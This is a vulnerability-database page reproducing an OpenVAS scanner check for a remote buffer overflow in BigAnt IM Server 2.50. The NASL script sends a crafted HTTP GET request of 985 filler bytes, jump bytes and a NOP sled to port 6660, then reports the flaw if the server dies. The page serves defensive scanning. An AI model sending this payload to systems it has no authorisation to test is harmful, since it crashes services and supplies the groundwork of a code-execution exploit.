Lucene search

K
openvasThis script is Copyright (C) 2009 Greenbone Networks GmbHOPENVAS:100278
HistoryOct 01, 2009 - 12:00 a.m.

BigAnt IM Server HTTP GET Request Buffer Overflow Vulnerability

2009-10-0100:00:00
This script is Copyright (C) 2009 Greenbone Networks GmbH
plugins.openvas.org
7

0.215 Low

EPSS

Percentile

96.5%

BigAnt IM Server is prone to a remote buffer-overflow vulnerability
because it fails to perform adequate boundary checks on user-
supplied input.

An attacker can exploit this issue to execute arbitrary code with the
privileges of the user running the server. Failed exploit attempts
will result in a denial-of-service condition.

BigAnt IM Server 2.50 is vulnerable; other versions may also be
affected.

NOTE: This issue may be related to the vulnerability described in BID
28795 (BigAnt IM Server HTTP GET Request Remote Buffer Overflow
Vulnerability). We will update or retire this BID if further
analysis or reports reveal that the two records represent the
same vulnerability.

###############################################################################
# OpenVAS Vulnerability Test
# $Id: BigAnt_36407.nasl 4574 2016-11-18 13:36:58Z teissa $
#
# BigAnt IM Server HTTP GET Request Buffer Overflow Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_summary = "BigAnt IM Server is prone to a remote buffer-overflow vulnerability
because it fails to perform adequate boundary checks on user-
supplied input.

An attacker can exploit this issue to execute arbitrary code with the
privileges of the user running the server. Failed exploit attempts
will result in a denial-of-service condition.

BigAnt IM Server 2.50 is vulnerable; other versions may also be
affected.

NOTE: This issue may be related to the vulnerability described in BID
      28795 (BigAnt IM Server HTTP GET Request Remote Buffer Overflow
      Vulnerability). We will update or retire this BID if further
      analysis or reports reveal that the two records represent the
      same vulnerability.";


tag_solution = "Updates are available. Please contact the vendor for details.";

if (description)
{
 script_id(100278);
 script_version("$Revision: 4574 $");
 script_tag(name:"last_modification", value:"$Date: 2016-11-18 14:36:58 +0100 (Fri, 18 Nov 2016) $");
 script_tag(name:"creation_date", value:"2009-10-01 18:57:31 +0200 (Thu, 01 Oct 2009)");
 script_bugtraq_id(36407);
 script_tag(name:"cvss_base", value:"10.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_cve_id("CVE-2009-4660");

 script_name("BigAnt IM Server HTTP GET Request Buffer Overflow Vulnerability");


 script_category(ACT_DENIAL);
  script_tag(name:"qod_type", value:"remote_vul");
 script_family("Buffer overflow");
 script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
 script_dependencies("BigAnt_detect.nasl");
 script_require_ports("Services/BigAnt", 6660);
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);
 script_xref(name : "URL" , value : "http://www.securityfocus.com/bid/36407");
 script_xref(name : "URL" , value : "http://www.bigantsoft.com");
 exit(0);
}

include("http_func.inc");

if(safe_checks())exit(0);

port = get_kb_item("Services/BigAnt");
if(!port)exit(0);
if(!get_port_state(port))exit(0);

payload =  crap(data:raw_string(0x41), length: 985);
payload += raw_string(0xeb,0x06,0x90,0x90,0x6a,0x19,0x9a,0x0f);
payload += crap(data:raw_string(0x90),length: 10);

soc = open_sock_tcp(port);
if(!soc)exit(0);

req = string("GET ", payload, "\r\n\r\n"); 
send(socket:soc, data:req);
if(http_is_dead(port: port)) {
    security_message(port:port);
    exit(0); 
}	

exit(0);

0.215 Low

EPSS

Percentile

96.5%

Related for OPENVAS:100278